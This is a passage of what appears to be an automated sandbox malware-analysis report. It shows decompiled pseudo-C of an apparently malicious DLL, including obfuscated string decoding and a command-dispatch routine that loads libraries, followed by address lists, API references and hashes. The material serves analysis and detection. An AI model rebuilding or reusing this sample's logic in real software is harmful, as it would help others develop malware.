				 *((long long*)(_t177 + 0x40)) = _t112;
				E67701000(_t117, "bc5d7097ae788a", _t164, _t179);
				 *((long long*)(_t177 + 0x48)) = _t112;
				E67701000(_t117, "bd546e92ae8d", _t164, _t179);
				 *((long long*)(_t177 + 0x50)) = _t112;
				E67701000(_t117, "c049", _t164, _t179);
				 *((long long*)(_t177 + 0x58)) = _t112;
				E67701000(_t117, "c0526384b67d", _t164, _t179);
				 *((long long*)(_t177 + 0x60)) = _t112;
				E67701000(_t117, "c0596192", _t164, _t179);
				 *((long long*)(_t177 + 0x68)) = _t112;
				E67701000(_t117, "c0596192967d", _t164, _t179);
				 *((long long*)(_t177 + 0x70)) = _t112;
				E67701000(_t117, "c0596192ac82bd", _t164, _t179);
				 *((long long*)(_t177 + 0x78)) = _t112;
				E67701000(_t117, "c2", _t164, _t179);
				 *((long long*)(_t174 - 0x80)) = _t112;
				E67701000(_t117, "c3", _t164, _t179);
				 *((long long*)(_t174 - 0x78)) = _t112;
				E67701000(_t117, "c4546084b67d", _t164, _t179);
				 *((long long*)(_t174 - 0x70)) = _t112;
				E67701000(_t117, "c454608a", _t164, _t179);
				 *((long long*)(_t174 - 0x68)) = _t112;
				E67701000(_t117, "c55a69", _t164, _t179);
				 *((long long*)(_t174 - 0x60)) = _t112;
				E67701000(_t117, "c55a6987b28b", _t164, _t179);
				 *((long long*)(_t174 - 0x58)) = _t112;
				E67701000(_t117, "c6516084b67d", _t164, _t179);
				 *((long long*)(_t174 - 0x50)) = _t112;
				E67701000(_t117, "c651608eb1", _t164, _t179);
				 *((long long*)(_t174 - 0x48)) = _t112;
				E67701000(_t117, "c655708ebc87", _t164, _t179);
				 *((long long*)(_t174 - 0x40)) = _t112;
				E67701000(_t117, "c746638a", _t164, _t179);
				 *((long long*)(_t174 - 0x38)) = _t112;
				E67701000(_t117, "c74b", _t164, _t179);
				 *((long long*)(_t174 - 0x30)) = _t112;
				E67701000(_t117, "c74b6894", _t164, _t179);
				 *((long long*)(_t174 - 0x28)) = _t112;
				E67701000(_t117, "c7515d88b286bed04f", _t164, _t179);
				 *((long long*)(_t174 - 0x20)) = _t112;
				E67701000(_t117, "c94a62", _t164, _t179);
				 *((long long*)(_t174 - 0x18)) = _t112;
				E67701000(_t117, "ca", _t164, _t179);
				 *((long long*)(_t174 - 0x10)) = _t112;
				E67701000(_t117, "ca4d6b9c", _t164, _t179);
				 *((long long*)(_t174 - 8)) = _t112;
				E67701000(_t117, "ca595d99b2", _t164, _t179);
				 *_t174 = _t112;
				E67701000(_t117, "ca595d99c28c", _t164, _t179);
				 *((long long*)(_t174 + 8)) = _t112;
				E67701000(_t117, "cb4663", _t164, _t179);
				 *((long long*)(_t174 + 0x10)) = _t112;
				E67701000(_t117, "cb4a6e92", _t164, _t179);
				 *((long long*)(_t174 + 0x18)) = _t112;
				E67701000(_t117, "cb4e7091b2", _t164, _t179);
				 *((long long*)(_t174 + 0x20)) = _t112;
				E67701000(_t117, "cd", _t164, _t179);
				 *((long long*)(_t174 + 0x28)) = _t112;
				E67701000(_t117, "cd466e", _t164, _t179);
				 *((long long*)(_t174 + 0x30)) = _t112;
				E67701000(_t117, "cd4e619c", _t164, _t179);
				 *((long long*)(_t174 + 0x38)) = _t112;
				E6770532C(4, _t112, _t117, __rsi, _t173);
				_t99 =  *( *(_t112 + 8));
				E677039E8(__edi, __esp, _t112, _t117, _t112, __rdi);
				if(_t99 < 0) {
					_t99 =  ~_t99;
				}
				_t115 = (_t164 >> 8) + (_t164 >> 8) * 8 << 5;
				_t168 =  *((intOrPtr*)(_t177 + 0x20 + _t115 * 8));
				lstrlenA(??);
				_t50 = _t115 + 1; // 0x1
				malloc(??);
				r8d = _t50;
				_t98 = lstrcpynA(??, ??, ??);
				_t118 = _t177 + 0x20;
				do {
					if( *_t118 != 0) {
						free();
					}
					_t118 = _t118 + 8;
					_t168 = _t168 - 1;
				} while (_t168 != 0);
				return _t98;
			}
















                                                                                                                                                  0x67704f00
                                                                                                                                                  0x67704f00
                                                                                                                                                  0x67704f00
                                                                                                                                                  0x67704f03
                                                                                                                                                  0x67704f07
                                                                                                                                                  0x67704f0b
                                                                                                                                                  0x67704f10
                                                                                                                                                  0x67704f14
                                                                                                                                                  0x67704f22
                                                                                                                                                  0x67704f2e
                                                                                                                                                  0x67704f33
                                                                                                                                                  0x67704f3f
                                                                                                                                                  0x67704f44
                                                                                                                                                  0x67704f50
                                                                                                                                                  0x67704f55
                                                                                                                                                  0x67704f61
                                                                                                                                                  0x67704f66
                                                                                                                                                  0x67704f72
                                                                                                                                                  0x67704f77
                                                                                                                                                  0x67704f83
                                                                                                                                                  0x67704f88
                                                                                                                                                  0x67704f94
                                                                                                                                                  0x67704f99
                                                                                                                                                  0x67704fa5
                                                                                                                                                  0x67704faa
                                                                                                                                                  0x67704fb6
                                                                                                                                                  0x67704fbb
                                                                                                                                                  0x67704fc7
                                                                                                                                                  0x67704fcc
                                                                                                                                                  0x67704fd8
                                                                                                                                                  0x67704fdd
                                                                                                                                                  0x67704fe9
                                                                                                                                                  0x67704fee
                                                                                                                                                  0x67704ffa
                                                                                                                                                  0x67704ffe
                                                                                                                                                  0x6770500a
                                                                                                                                                  0x6770500e
                                                                                                                                                  0x6770501a
                                                                                                                                                  0x6770501e
                                                                                                                                                  0x6770502a
                                                                                                                                                  0x6770502e
                                                                                                                                                  0x6770503a
                                                                                                                                                  0x6770503e
                                                                                                                                                  0x6770504a
                                                                                                                                                  0x6770504e
                                                                                                                                                  0x6770505a
                                                                                                                                                  0x6770505e
                                                                                                                                                  0x6770506a
                                                                                                                                                  0x6770506e
                                                                                                                                                  0x6770507a
                                                                                                                                                  0x6770507e
                                                                                                                                                  0x6770508a
                                                                                                                                                  0x6770508e
                                                                                                                                                  0x6770509a
                                                                                                                                                  0x6770509e
                                                                                                                                                  0x677050aa
                                                                                                                                                  0x677050ae
                                                                                                                                                  0x677050ba
                                                                                                                                                  0x677050be
                                                                                                                                                  0x677050ca
                                                                                                                                                  0x677050ce
                                                                                                                                                  0x677050d3
                                                                                                                                                  0x677050de
                                                                                                                                                  0x677050ea
                                                                                                                                                  0x677050ee
                                                                                                                                                  0x677050fa
                                                                                                                                                  0x677050fe
                                                                                                                                                  0x6770510a
                                                                                                                                                  0x6770510e
                                                                                                                                                  0x6770511a
                                                                                                                                                  0x6770511e
                                                                                                                                                  0x6770512a
                                                                                                                                                  0x6770512e
                                                                                                                                                  0x6770513a
                                                                                                                                                  0x6770513e
                                                                                                                                                  0x6770514a
                                                                                                                                                  0x6770514e
                                                                                                                                                  0x6770515a
                                                                                                                                                  0x6770515e
                                                                                                                                                  0x67705168
                                                                                                                                                  0x6770516c
                                                                                                                                                  0x67705175
                                                                                                                                                  0x6770517a
                                                                                                                                                  0x67705181
                                                                                                                                                  0x67705183
                                                                                                                                                  0x67705183
                                                                                                                                                  0x6770519d
                                                                                                                                                  0x677051aa
                                                                                                                                                  0x677051b2
                                                                                                                                                  0x677051b8
                                                                                                                                                  0x677051bd
                                                                                                                                                  0x677051c2
                                                                                                                                                  0x677051ce
                                                                                                                                                  0x677051d4
                                                                                                                                                  0x677051de
                                                                                                                                                  0x677051e4
                                                                                                                                                  0x677051e6
                                                                                                                                                  0x677051e6
                                                                                                                                                  0x677051eb
                                                                                                                                                  0x677051ef
                                                                                                                                                  0x677051ef
                                                                                                                                                  0x6770520f

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 67701000: malloc.LIBCMT ref: 67701053
                                                                                                                                                    • Part of subcall function 67701000: rand.LIBCMT ref: 677010D6
                                                                                                                                                    • Part of subcall function 6770532C: malloc.LIBCMT ref: 67705342
                                                                                                                                                    • Part of subcall function 6770532C: malloc.LIBCMT ref: 6770534C
                                                                                                                                                    • Part of subcall function 6770532C: CryptGenRandom.ADVAPI32(?,?,00000000,67704A26,?,?,?,6770147B), ref: 67705366
                                                                                                                                                    • Part of subcall function 6770532C: free.LIBCMT ref: 67705373
                                                                                                                                                    • Part of subcall function 6770532C: free.LIBCMT ref: 6770537B
                                                                                                                                                    • Part of subcall function 677039E8: free.LIBCMT ref: 67703A03
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 677051B2
                                                                                                                                                  • malloc.LIBCMT ref: 677051BD
                                                                                                                                                  • lstrcpynA.KERNEL32 ref: 677051CE
                                                                                                                                                  • free.LIBCMT ref: 677051E6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: freemalloc$CryptRandomlstrcpynlstrlenrand
                                                                                                                                                  • String ID: b848708ebc87$b85763$ba466995ae82c0d03a4c3f$bb467086$bc5d7097ae$bc5d7097ae788a$bd546e92ae8d$c049$c0526384b67d$c0596192$c0596192967d$c0596192ac82bd$c4546084b67d$c454608a$c55a69$c55a6987b28b$c6516084b67d$c651608eb1$c655708ebc87$c746638a$c74b$c74b6894$c7515d88b286bed04f$c94a62$ca4d6b9c$ca595d99b2$ca595d99c28c$cb4663$cb4a6e92$cb4e7091b2$cd466e$cd4e619c
                                                                                                                                                  • API String ID: 1236244486-3267319073
                                                                                                                                                  • Opcode ID: c5656c8c3c5a3596408e6ea24b1f08f368d3cdca555721459b36d8e9583df429
                                                                                                                                                  • Instruction ID: 7b89e3d1a31f49f80e5b9253e2fa471dc6f69271cf14754528b270f2f671e741
                                                                                                                                                  • Opcode Fuzzy Hash: c5656c8c3c5a3596408e6ea24b1f08f368d3cdca555721459b36d8e9583df429
                                                                                                                                                  • Instruction Fuzzy Hash: 2F814475619B8190EB01DBA0F9983AC73E9F79878CFE40025EA8D83718EF39C164C352
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67701D70, Relevance: 51.2, APIs: 27, Strings: 2, Instructions: 465COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                  			E67701D70(signed short __ecx, void* __edx, void* __esp, signed long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed long long __rbp, void* __r8, void* __r9, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v56;
				char _v664;
				void* _v680;
				void* __rdi;
				void* _t72;
				void* _t91;
				long _t95;
				void* _t117;
				void* _t139;
				void* _t145;
				void* _t147;
				void* _t157;
				void* _t160;
				void* _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t175;
				long _t176;
				void* _t178;
				signed long long _t181;
				signed long long _t182;
				signed long long _t186;
				signed long long _t187;
				signed long long _t189;
				signed long long _t199;
				intOrPtr* _t221;
				intOrPtr* _t248;
				void* _t267;
				signed long long _t268;
				signed short* _t282;
				signed long long _t284;
				signed long long _t286;
				signed long long _t288;
				char* _t289;
				intOrPtr* _t292;
				intOrPtr* _t293;
				intOrPtr* _t294;
				signed long long _t296;
				void** _t297;
				void* _t298;
				intOrPtr* _t299;
				void** _t300;
				intOrPtr* _t301;
				void** _t302;
				void** _t303;
				void* _t304;
				intOrPtr* _t305;
				void** _t306;
				void* _t307;
				void** _t308;
				void** _t309;
				intOrPtr* _t310;
				void** _t311;
				void** _t312;
				void* _t313;
				intOrPtr* _t314;
				signed long long _t315;
				void* _t317;
				signed long long _t325;
				signed long long _t326;
				signed long long _t327;
				signed long long _t328;
				signed long long _t329;
				signed long long _t330;
				signed long long _t331;
				signed long long _t332;
				void* _t333;
				signed long long _t334;

				_t323 = __r9;
				_t320 = __r8;
				_t315 = __rbp;
				_t267 = __rdx;
				_t184 = __rbx;
				_t177 = __esp;
				_t148 = __ecx;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t318 = _t317 - 0x2a0;
				_t181 =  *0x67716000; // 0x9b7b11e8241
				_t182 = _t181 ^ _t317 - 0x000002a0;
				_v56 = _t182;
				_t292 =  *((intOrPtr*)(__rcx + 8));
				r14d = 0x1bd75010;
				_t176 = 0;
				if( *_t292 == r14d) {
					r15d = 4;
					_t293 = _t292 + _t333;
					_t157 =  *((intOrPtr*)(_t293 + 1));
					_t148 =  *((intOrPtr*)(_t293 + 2));
					_t294 = _t293 + _t333;
					__eflags =  *_t293 - 1;
					if( *_t293 != 1) {
						goto L1;
					}
					__eflags = _t157;
					if(_t157 != 0) {
						__eflags = _t157 - 1;
						if(_t157 != 1) {
							__eflags = _t157 - 2;
							if(_t157 != 2) {
								__eflags = _t157 - 3;
								if(_t157 != 3) {
									L64:
									L65:
									return E67706F80(_t148, _v56 ^ _t318);
								}
								__eflags = _t148 - 1;
								if(_t148 != 1) {
									goto L64;
								}
								__eflags =  *_t294 - r14d;
								if( *_t294 != r14d) {
									goto L1;
								}
								__eflags =  *(_t294 + _t333);
								if( *(_t294 + _t333) == 0) {
									goto L1;
								}
								_t57 = _t333 + 4; // 0x1bd75014
								E67703938( *(_t294 + _t333), __esp, _t182, __rbx, _t294 + _t57, _t294, __r8);
								_t296 = _t182;
								_t72 = E67703938(0x10, __esp, _t182, _t184, 0x67713018, _t296, __r8);
								_t268 = _t182;
								_t283 = _t182;
								E67704688(_t72, _t148, 0x10, _t184, _t296, _t268, __r9);
								_t186 = _t182;
								E677039E8(_t169, __esp, _t182, _t186, _t182, _t182);
								__eflags = _t186;
								if(_t186 == 0) {
									L77:
									dil = bpl;
									L78:
									E677039E8(_t169, _t177, _t182, _t186, _t186, _t283);
									_t199 = _t296;
									__eflags = dil;
									if(dil != 0) {
										dil = E67705F9C(_t182, _t186, _t199, _t268, _t315, _t320);
										E677039E8(_t169, _t177, _t182, _t186, _t296, _t283);
										_t160 = 0;
										__eflags = dil;
										if(__eflags != 0) {
											 *0x67718431 = 1;
											_t148 = 0x1e;
										} else {
											_t67 = _t268 + 0x20; // 0x20
											_t148 = _t67;
										}
									} else {
										E677039E8(_t169, _t177, _t182, _t186, _t199, _t283);
										_t160 = 0;
										__eflags = 0;
										_t66 = _t268 + 0x1f; // 0x1f
										_t148 = _t66;
									}
									E677060CC(_t148, _t160, _t169, _t177, __eflags, _t186, _t268, _t320, _t323);
									goto L65;
								}
								_t169 =  *_t186;
								__eflags =  *_t186 - 5;
								if( *_t186 < 5) {
									goto L77;
								}
								_t268 =  *((intOrPtr*)(_t186 + 8));
								__eflags =  *_t268 - 0x7b;
								if( *_t268 != 0x7b) {
									goto L77;
								}
								__eflags =  *((char*)(1 + _t268)) - 0x22;
								if( *((char*)(1 + _t268)) != 0x22) {
									goto L77;
								}
								__eflags =  *((intOrPtr*)(_t182 + _t268)) - bpl;
								if( *((intOrPtr*)(_t182 + _t268)) != bpl) {
									goto L77;
								}
								__eflags =  *((char*)(_t182 + _t268)) - 0x7d;
								if( *((char*)(_t182 + _t268)) != 0x7d) {
									goto L77;
								}
								dil = 1;
								__eflags =  *((char*)(_t182 + _t268)) - 0x22;
								if( *((char*)(_t182 + _t268)) == 0x22) {
									goto L78;
								}
								goto L77;
							}
							__eflags = _t148 - 3;
							if(_t148 != 3) {
								goto L64;
							}
							_t297 = _t294 + _t333;
							__eflags =  *_t294 - r14d;
							if( *_t294 != r14d) {
								goto L1;
							}
							_t170 =  *_t297;
							_t298 = _t297 + _t333;
							__eflags = _t170;
							if(_t170 == 0) {
								goto L1;
							}
							_t161 = _t170;
							E67703938(_t170, __esp, _t182, __rbx, _t298, _t298, __r8);
							_t299 = _t298 + _t282;
							_t148 =  *_t299;
							_t300 = _t299 + _t333;
							_t328 = _t182;
							__eflags =  *_t299 - r14d;
							if( *_t299 != r14d) {
								L20:
								E677039E8(_t170, _t177, _t182, _t184, _t182, _t282);
								goto L1;
							}
							_t171 =  *_t300;
							_t301 = _t300 + _t333;
							__eflags = _t171;
							if(_t171 == 0) {
								E67701000(_t184, "bb5168", _t267, __r8);
								_t282 = _t182;
								malloc(??);
								 *_t182 = 0x2e;
								 *(4 + _t182) = bpl;
								 *((short*)(1 + _t182)) =  *_t282 & 0x0000ffff;
								_t148 = _t282[1];
								_t325 = _t182;
								 *((char*)(_t182 + 3)) = _t282[1];
								free(??);
							} else {
								_t161 = _t171;
								_t221 = _t301;
								E67703938(_t171, __esp, _t182, _t184, _t221, _t301, __r8);
								_t184 = _t182;
								malloc(??);
								_t38 =  &(_t282[0]); // 0x5
								_t148 = _t38;
								 *_t182 = 0x2e;
								r8d = _t171;
								 *(_t221 + _t182) = bpl;
								_t40 = 1 + _t182; // 0x1
								_t325 = _t182;
								E6770ED80(_t38, _t40,  *((intOrPtr*)(_t182 + 8)), __r8);
								_t301 = _t301 + _t282;
								E677039E8(_t171, __esp, _t182, _t182, _t182, _t282);
							}
							_t302 = _t301 + _t333;
							__eflags =  *_t301 - r14d;
							if( *_t301 == r14d) {
								r15d =  *_t302;
								_t331 = _t315;
								__eflags = r15d;
								if(r15d != 0) {
									_t45 =  &(_t302[1]); // 0x1bd75014
									_t161 = r15d;
									E67703938(r15d, _t177, _t182, _t184, _t45, _t302, _t320);
									_t148 = _t333 + 1;
									malloc(??);
									r8d = r15d;
									_t184 = _t182;
									 *(_t182 + _t333) = bpl;
									E6770ED80(_t333 + 1, _t182,  *((intOrPtr*)(_t182 + 8)), _t320);
									E677039E8(_t171, _t177, _t182, _t182, _t182, _t182);
									E67703B5C(_t175, _t182, _t182, _t182, _t302);
									_t331 = _t182;
									free(??);
								}
								E67703B5C(_t175, _t182, _t184, _t325, _t302);
								_t187 = _t182;
								free(??);
								__eflags = _t187;
								if(_t187 != 0) {
									E67702BE0(_t148, _t161, _t171, _t177, _t187, _t187, _t331, _t320, _t323);
									_t284 = _t182;
								} else {
									_t284 = _t315;
								}
								__eflags = _t331;
								if(_t331 != 0) {
									free();
								}
								free();
								_t270 = _t328;
								_t91 = E6770275C(_t187, _t284, _t328);
								__eflags = _t91 - 1;
								if(_t91 == 1) {
									LoadLibraryW();
									__eflags = _t182;
									if(__eflags != 0) {
										_t148 = 0x14;
									} else {
										_t95 = GetLastError();
										_t148 = 0x18;
										_t176 = _t95;
									}
									E677060CC(_t148, _t176, _t171, _t177, __eflags, _t187, _t270, _t320, _t323);
									_t315 = _t182;
								}
								E677039E8(_t171, _t177, _t182, _t187, _t328, _t284);
								L63:
								free();
								goto L64;
							} else {
								E677039E8(_t171, _t177, _t182, _t184, _t328, _t282);
								L24:
								free();
								goto L1;
							}
						}
						__eflags = _t148 - r15b;
						if(_t148 != r15b) {
							goto L64;
						}
						_t303 = _t294 + _t333;
						__eflags =  *_t294 - r14d;
						if( *_t294 != r14d) {
							goto L1;
						}
						_t170 =  *_t303;
						_t304 = _t303 + _t333;
						__eflags = _t170;
						if(_t170 == 0) {
							goto L1;
						}
						E67703938(_t170, __esp, _t182, __rbx, _t304, _t304, __r8);
						_t305 = _t304 + _t282;
						_t148 =  *_t305;
						_t306 = _t305 + _t333;
						_t326 = _t182;
						__eflags =  *_t305 - r14d;
						if( *_t305 == r14d) {
							_t170 =  *_t306;
							_t307 = _t306 + _t333;
							__eflags = _t170;
							if(_t170 == 0) {
								goto L20;
							}
							E67703938(_t170, __esp, _t182, _t184, _t307, _t307, __r8);
							_t18 =  &(_t282[0]); // 0x5
							_t148 = _t18;
							_t188 = _t182;
							malloc(??);
							_t273 =  *((intOrPtr*)(_t188 + 8));
							r8d = _t170;
							_t329 = _t182;
							 *(_t282 + _t182) = bpl;
							E6770ED80(_t18, _t182,  *((intOrPtr*)(_t188 + 8)), __r8);
							_t308 = _t307 + _t282;
							E677039E8(_t170, __esp, _t182, _t188, _t188, _t282);
							_t165 =  *_t308;
							_t309 = _t308 + _t333;
							__eflags =  *_t308 - r14d;
							if( *_t308 == r14d) {
								_t172 =  *_t309;
								_t310 = _t309 + _t333;
								__eflags = _t172;
								if(_t172 == 0) {
									E67701000(_t188, "bb5168", _t273, _t320);
									_t282 = _t182;
									malloc(??);
									 *_t182 = 0x2e;
									 *(4 + _t182) = bpl;
									 *((short*)(1 + _t182)) =  *_t282 & 0x0000ffff;
									_t148 = _t282[1];
									_t332 = _t182;
									 *((char*)(_t182 + 3)) = _t282[1];
									free(??);
								} else {
									_t165 = _t172;
									_t248 = _t310;
									E67703938(_t172, __esp, _t182, _t188, _t248, _t310, _t320);
									_t188 = _t182;
									malloc(??);
									_t23 =  &(_t282[0]); // 0x5
									_t148 = _t23;
									 *_t182 = 0x2e;
									r8d = _t172;
									 *(_t248 + _t182) = bpl;
									_t25 = 1 + _t182; // 0x1
									_t332 = _t182;
									E6770ED80(_t23, _t25,  *((intOrPtr*)(_t188 + 8)), _t320);
									_t310 = _t310 + _t282;
									E677039E8(_t172, _t177, _t182, _t188, _t188, _t282);
								}
								_t311 = _t310 + _t333;
								__eflags =  *_t310 - 0x1bd75010;
								if( *_t310 == 0x1bd75010) {
									_t145 =  *_t311;
									_t334 = _t315;
									_v680 = _t145;
									__eflags = _t145;
									if(_t145 != 0) {
										_t31 =  &(_t311[1]); // 0x1bd75014
										_t165 = _t145;
										E67703938(_t145, _t177, _t182, _t188, _t31, _t311, _t320);
										_t32 = 1 + _t188; // 0x1
										_t148 = _t32;
										malloc(??);
										r8d = _v680;
										 *(_t320 + _t182) = bpl;
										_t188 = _t182;
										E6770ED80(_t32, _t182,  *((intOrPtr*)(_t182 + 8)), _t320);
										E677039E8(_t172, _t177, _t182, _t182, _t182, _t182);
										E67703B5C(_t175, _t182, _t182, _t182, _t311);
										_t334 = _t182;
										free(??);
									}
									E67703B5C(_t175, _t182, _t188, _t332, _t311);
									_t189 = _t182;
									free(??);
									__eflags = _t189;
									if(_t189 != 0) {
										E67702BE0(_t148, _t165, _t172, _t177, _t189, _t189, _t334, _t320, _t323);
										_t286 = _t182;
									} else {
										_t286 = _t315;
									}
									__eflags = _t334;
									if(_t334 != 0) {
										free();
									}
									free();
									_t117 = E6770275C(_t189, _t286, _t326);
									__eflags = _t117 - 1;
									if(_t117 == 1) {
										E677023DC(_t172, _t177, _t189, _t286, _t329);
										_t315 = _t182;
									}
									E677039E8(_t172, _t177, _t182, _t189, _t326, _t286);
									free(??);
									goto L63;
								} else {
									E677039E8(_t172, _t177, _t182, _t188, _t326, _t282);
									free(??);
									goto L24;
								}
							}
							E677039E8(_t170, __esp, _t182, _t188, _t326, _t282);
							goto L24;
						}
						goto L20;
					}
					__eflags = _t148 - 2;
					if(_t148 != 2) {
						goto L64;
					}
					_t312 = _t294 + _t333;
					__eflags =  *_t294 - r14d;
					if( *_t294 != r14d) {
						goto L1;
					}
					_t173 =  *_t312;
					_t313 = _t312 + _t333;
					__eflags = _t173;
					if(_t173 == 0) {
						goto L1;
					}
					E67703938(_t173, __esp, _t182, __rbx, _t313, _t313, __r8);
					_t314 = _t313 + _t282;
					_t330 = _t182;
					E67707F34(_t182,  &_v664, _t267, ".");
					E67701160(__eflags, _t182, _t184, "bc5d61", _t314, ".");
					_t322 = _t182;
					_t288 = _t182;
					E67707AD0(_t182,  &_v664, _t267, _t182);
					__eflags = _t288;
					if(_t288 != 0) {
						free();
					}
					__eflags =  *_t314 - r14d;
					if( *_t314 != r14d) {
						goto L1;
					} else {
						_t147 =  *(_t314 + _t333);
						_t327 = _t315;
						__eflags = _t147;
						if(_t147 != 0) {
							_t11 = 1 + _t184; // 0x12c
							_t148 = _t11;
							malloc(??);
							_t13 = _t333 + 4; // 0x1bd75014
							r8d = _t147;
							 *(_t184 + _t182) = bpl;
							E6770ED80(_t11, _t182, _t314 + _t13, _t322);
							E67703B5C(_t175, _t182, _t184, _t182, _t314);
							_t327 = _t182;
							free(??);
						}
						E67702BE0(_t148, 0x12b, _t173, _t177, _t184,  &_v664, _t327, _t322, _t323);
						_t190 = _t182;
						free(??);
						_t289 =  &_v664;
						_t280 = _t330;
						memset(_t173, 0, 0x256 << 0);
						_t178 = _t177 + 0xc;
						_t174 = _t173 + 0x256;
						_t148 = 0;
						_t139 = E6770275C(_t182, _t182, _t330);
						__eflags = _t139 - 1;
						if(_t139 == 1) {
							E67702634(0, _t174, _t178, _t190, _t190, _t280, _t314, _t322);
							_t315 = _t182;
						}
						E677039E8(_t174, _t178, _t182, _t190, _t330, _t289);
						goto L63;
					}
				}
				L1:
				goto L65;
			}










































































                                                                                                                                                  0x67701d70
                                                                                                                                                  0x67701d70
                                                                                                                                                  0x67701d70
                                                                                                                                                  0x67701d70
                                                                                                                                                  0x67701d70
                                                                                                                                                  0x67701d70
                                                                                                                                                  0x67701d70
                                                                                                                                                  0x67701d70
                                                                                                                                                  0x67701d75
                                                                                                                                                  0x67701d7a
                                                                                                                                                  0x67701d88
                                                                                                                                                  0x67701d8f
                                                                                                                                                  0x67701d96
                                                                                                                                                  0x67701d99
                                                                                                                                                  0x67701da1
                                                                                                                                                  0x67701da5
                                                                                                                                                  0x67701dab
                                                                                                                                                  0x67701db0
                                                                                                                                                  0x67701db9
                                                                                                                                                  0x67701dbf
                                                                                                                                                  0x67701dc4
                                                                                                                                                  0x67701dc7
                                                                                                                                                  0x67701dca
                                                                                                                                                  0x67701dcd
                                                                                                                                                  0x67701dcf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701dd1
                                                                                                                                                  0x67701dd3
                                                                                                                                                  0x67701edf
                                                                                                                                                  0x67701ee2
                                                                                                                                                  0x67702101
                                                                                                                                                  0x67702104
                                                                                                                                                  0x677022fa
                                                                                                                                                  0x677022fd
                                                                                                                                                  0x677022c6
                                                                                                                                                  0x677022c9
                                                                                                                                                  0x677022f9
                                                                                                                                                  0x677022f9
                                                                                                                                                  0x677022ff
                                                                                                                                                  0x67702302
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702304
                                                                                                                                                  0x67702307
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770230d
                                                                                                                                                  0x67702311
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770231b
                                                                                                                                                  0x67702320
                                                                                                                                                  0x67702331
                                                                                                                                                  0x67702334
                                                                                                                                                  0x6770233c
                                                                                                                                                  0x6770233f
                                                                                                                                                  0x67702342
                                                                                                                                                  0x6770234a
                                                                                                                                                  0x6770234d
                                                                                                                                                  0x67702352
                                                                                                                                                  0x67702355
                                                                                                                                                  0x6770238b
                                                                                                                                                  0x6770238b
                                                                                                                                                  0x6770238e
                                                                                                                                                  0x67702391
                                                                                                                                                  0x67702396
                                                                                                                                                  0x67702399
                                                                                                                                                  0x6770239c
                                                                                                                                                  0x677023ba
                                                                                                                                                  0x677023bd
                                                                                                                                                  0x677023c2
                                                                                                                                                  0x677023c4
                                                                                                                                                  0x677023c7
                                                                                                                                                  0x677023ce
                                                                                                                                                  0x677023d5
                                                                                                                                                  0x677023c9
                                                                                                                                                  0x677023c9
                                                                                                                                                  0x677023c9
                                                                                                                                                  0x677023c9
                                                                                                                                                  0x6770239e
                                                                                                                                                  0x6770239e
                                                                                                                                                  0x677023a3
                                                                                                                                                  0x677023a3
                                                                                                                                                  0x677023a5
                                                                                                                                                  0x677023a5
                                                                                                                                                  0x677023a5
                                                                                                                                                  0x677023a8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677023a8
                                                                                                                                                  0x67702357
                                                                                                                                                  0x67702359
                                                                                                                                                  0x6770235c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770235e
                                                                                                                                                  0x67702362
                                                                                                                                                  0x67702365
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702367
                                                                                                                                                  0x6770236b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702370
                                                                                                                                                  0x67702374
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702379
                                                                                                                                                  0x6770237d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702382
                                                                                                                                                  0x67702385
                                                                                                                                                  0x67702389
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702389
                                                                                                                                                  0x6770210a
                                                                                                                                                  0x6770210d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702115
                                                                                                                                                  0x67702118
                                                                                                                                                  0x6770211b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702121
                                                                                                                                                  0x67702123
                                                                                                                                                  0x67702126
                                                                                                                                                  0x67702128
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770212e
                                                                                                                                                  0x67702133
                                                                                                                                                  0x67702138
                                                                                                                                                  0x6770213b
                                                                                                                                                  0x6770213d
                                                                                                                                                  0x67702140
                                                                                                                                                  0x67702143
                                                                                                                                                  0x67702146
                                                                                                                                                  0x67701f26
                                                                                                                                                  0x67701f29
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701f29
                                                                                                                                                  0x6770214c
                                                                                                                                                  0x6770214e
                                                                                                                                                  0x67702151
                                                                                                                                                  0x67702153
                                                                                                                                                  0x6770219b
                                                                                                                                                  0x677021a5
                                                                                                                                                  0x677021a8
                                                                                                                                                  0x677021ad
